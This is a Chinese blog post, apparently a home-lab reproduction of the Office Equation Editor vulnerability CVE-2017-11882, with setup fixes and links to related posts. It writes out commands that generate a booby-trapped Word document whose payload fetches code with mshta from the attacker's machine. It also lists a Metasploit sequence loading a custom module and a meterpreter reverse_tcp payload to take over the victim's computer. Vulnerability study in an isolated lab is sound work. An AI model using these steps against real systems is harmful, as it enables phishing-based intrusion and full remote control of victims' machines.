CVE-2017-11882漏洞复现过程中遇到的一些小问题

已于 2022-01-24 15:28:20 修改
阅读量3.8k 收藏 1
点赞数
文章标签: 安全
于 2022-01-24 15:27:06 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44375751/article/details/122666605
版权

一、实验环境

靶机:Windows7 office2003  IP:192.168.87.129

渗透机:Kali Linux 2021.4a   IP:192.168.87.130

问题1:安装的office2003中插入-对象中没有Microsoft 公式 3.0

解决方法:工具-自定义-命令  类别“插入”中找到命令“公式编辑器” 将其拖到工具栏中,点击图标,提示该功能尚未安装,点击是进行安装。

二、使用POC代码生成word文件

root@kali:~/Desktop/CVE-2017-11882# python2 Command109b_CVE-2017-11882.py -c "cmd.exe /c calc.exe" -o calc.doc

上述代码生产的calc.doc文档在靶机上打开时会同时打开计算器,做测试用

root@kali:~/Desktop/CVE-2017-11882# python2  Command109b_CVE-2017-11882.py -c "mshta http://192.168.87.130:8080/11882" -o exploit.doc

上述代码生成的exploit.doc文档即攻击文档,备用。其中IP地址为渗透机Kali的IP地址,注意修改

问题2:Kali Linux 14.4a终端中python指令不存在,需用python2或python3执行,这里使用python3会报错

SyntaxError: Missing parentheses in call to 'print'. Did you mean print("[!] Primitive command must be shorter than 43 bytes")?

因此使用python2执行

三、加载PS_shell.rb模块

将PS_shell.rb拷贝至路径/usr/share/metasploit-framework/modules/exploits/windows/smb

在msfconsole中reload_all进行更新!!!

问题3:将PS_shell.rb改名为CVE-2017-11882.rb时会出现加载失败,发现是-符号的问题,可改名为CVE_2017_11882.rb

四、攻击流程

1、在Kali终端执行msfconsole

2、search CVE_2017_11882

3、use exploit/windows/smb/CVE_2017_11882

4、set payload windows/meterpreter/reverse_tcp

5、set LHOST 192.168.87.130(注意此处与生成exploit.doc文档的代码需相同)

6、set uripath 11882(注意此处与生成exploit.doc文档的代码需相同)

7、exploit

8、sessions(查看连接的会话)

9、sessions 1(进入连接,可以为所欲为了)

五、参考链接

具体流程参考[漏洞复现] CVE-2017-11882 通杀所有Office版本 - 知乎

相关文件下载参考CVE-2017-11882漏洞利用 - Oran9e - 博客园

-雾嶋
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CVE-2017-11882漏洞分析与利用
qq_36949907的博客
07-10 1460
(一次大作业,比较啰嗦 见谅) 漏洞介绍 2017年11月14号,微软推送了常规的安全更新,其就包括CVE-2017-11882安全更新,当时还引起了不小的关注,之后Github上也公布了许多POC及对应的漏洞利用程序。 仅仅从CVE-2017-11882漏洞利用效果来看,它可以通杀Office 2003到Office 2016的所有版本,并且整个攻击环境的构建非常简单,效果又非常的好。例如,有些攻击效果会出现弹框、CPU飙高、发生异常等等,而这个漏洞的利用效果,堪称“无色无味”,即整个过程几.
msf生成webshell_CVE-2017-11882漏洞复现结合MSF拿电脑shell
weixin_32139875的博客
01-16 442
两个代码分别贴上[Python] 纯文本查看 复制代码import argparseimport sysRTF_HEADER = R"""{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Calibri;}}{\*\generator Riched20 6.3.9600}\viewkin...
cve-2017-11882
weixin_34397291的博客
06-23 102
2017年11月14日,微软发布了11月份的安全补丁更新,其比较引人关注的莫过于悄然修复了潜伏17年之久的Office远程代码执行漏洞CVE-2017-11882)。该漏洞为Office内存破坏漏洞,影响目前流行的所有Office版本。gongji者可以利用漏洞以当前登录的用户的身份执行任意命令。漏洞影响版本:Office 365Microsoft Office 2000 ...
CVE-2017-11882 复现
Aevery的博客
02-13 2674
CVE_2017-11882复现
MSF渗透测试-CVE-2017-11882(MSOffice漏洞
weixin_30652491的博客
04-18 375
1.测试环境 2.测试前准备 3.测试过程 —3.1虚拟机环境测试 —3.2局域网靶机测试 4.测试感想 1.测试环境 攻击机: OS:kail IP:192.168.15.132/192.168.137.231 靶机: OS:Windows7 Office版本:Office2013_CN IP: 2.测试前准备 1.下载python脚本 2.下载MSF组件 3.将cve_2017_...
Office隐藏17年的漏洞CVE_2017_11882测试记录
weixin_33676492的博客
11-25 153
Office隐藏17年的漏洞CVE_2017_11882测试记录 创建时间: 2017/11/25 0:18 作者: CN_Simo 标签: Office漏洞 参考文章1:https://www.cnblogs.com/Oran9e/p/7880832.html 参考文章2:https://www.cnblogs.co...
CVE-2017-8759-Exploit-sample-master
07-05
CVE-2017-8759-Exploit-sample-master漏洞示例代码。
浅谈Node.js CVE-2017-14849 漏洞分析(详细步骤)
10-19
主要介绍了浅谈Node.js CVE-2017-14849 漏洞分析(详细步骤),小编觉得挺不错的,现在分享给大家,也给大家做个参考。一起跟随小编过来看看吧
CVE-2017-11882漏洞利用
自学编程_youkewang.top
02-19 2933
CVE-2017-11882是office远程代码执行漏洞,该漏洞为office内存破坏漏洞,影响目前流行的office版本。实验环境:Kali + Win7 + office2013 下面演示实验过程。Poc下载:https://github.com/Ridter/CVE-2e017-11882/PS_shell.rb下载:https://github.com/starnightcyber/CV...
Metasploit系列----模块详解
bronze_s的博客
04-25 1352
kali linux默认集成了metasploit Framework社区版本,是精简后的免费版本。使用者多为安全研究人员或学生。 metasploit的模块分类 exploit(渗透模块): 是一段程序,运行时会利用目标的安全漏洞进行安全测试。 payload(安全测试载荷模块): 在成功对目标完成一次渗透测试,payload将在目标机器运行,帮助我们获取目标上需要的访问和运行权限。 auxiliary(辅助模块): 包含扫描、fuzz测试、漏洞挖掘、网络协议欺骗等程序。 encoder(编码器模
CVE-2017-11882利用
Jiajiajiang_的博客
06-20 1093
利用kail的msf进行攻击, 首先打开kali,查看 IP,可以看到我的虚拟机kali的 IP是192.168.3.116。把Command43b_CVE-2017-11882.py下载下来放kali的桌面就可以。接下来就要把PS_shell.rb文件下载下来。就把PS_shell.rb和ms17-010.rb放一起吧。 所有用到的资源:链接:https://pan.baidu.com/s/...
Redis在Windows环境下Getshell
3569
08-07 5399
https://uknowsec.cn/posts/notes/Redis%E5%9C%A8Windows%E7%8E%AF%E5%A2%83%E4%B8%8BGetshell.html 虽说利用过程得 重启,我觉得 还有一种就是 利用钓鱼吧,直接在桌面生成一个 windows updade.dat 或者一些诱导性质的文件名让用户点击,就是稍微不靠谱点 0.0 环境搭建 windows版本...
Office CVE-2017-11882本地复现
Jun_ay的博客
11-22 3855
Office CVE-2017-11882本地复现 这两天,office又出名了,CVE-2017-11882成了圈里关注的热点,今年office爆出好几个漏洞,从CVE-2017-0199、CVE-2017-8570到现在的CVE-2017-11882,exp也是越来越简单粗暴。 下面,我也来蹭波热度。Step1:万年计算器POCPOC GitHub:可以使用国外出现的第一份poc:https
CVE-2017-11882漏洞利用(kali虚拟机开后门)
weixin_44279850的博客
12-27 1886
msf终端简单了解 Metasploit是一款开源的安全漏洞检测工具, Metasploit软件为它基础功能提供了多个用户接口,包括终端、命令行、图像化界面等。 MSF终端(msfconsole)是目前Metasploit框架最为流行的用户接口,而且MSF终端是Metasploit框架最灵活、功能最丰富以及支持最好的工具之一。MSF终端提供了一站式的接口,能访问Metasploit框架几乎每一...
CVE-2017-11882漏洞复现
weixin_30555125的博客
12-20 218
作者:zero 漏洞信息:CVE-2017-11882 2017年11月14日,微软发布了11月份的安全补丁更新,其比较引人关注的莫过于悄然修复了潜伏17年之久的Office远程代码执行漏洞CVE-2017-11882)。该漏洞为Office内 存破坏漏洞,影响目前流行的所有Office版本。攻击者可以利用漏洞以当前登录的用户的身份执行任意命令。 漏洞影响版...
cve-2017-7504漏洞复现
最新发布
08-23
对于CVE-2017-7504漏洞复现,请注意以下几个步骤: 1. 确认受影响的软件版本:CVE-2017-7504是一个Apache Struts 2框架的远程代码执行漏洞。在复现之前,请确保目标系统运行的是受影响的Apache Struts 2版本。 ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值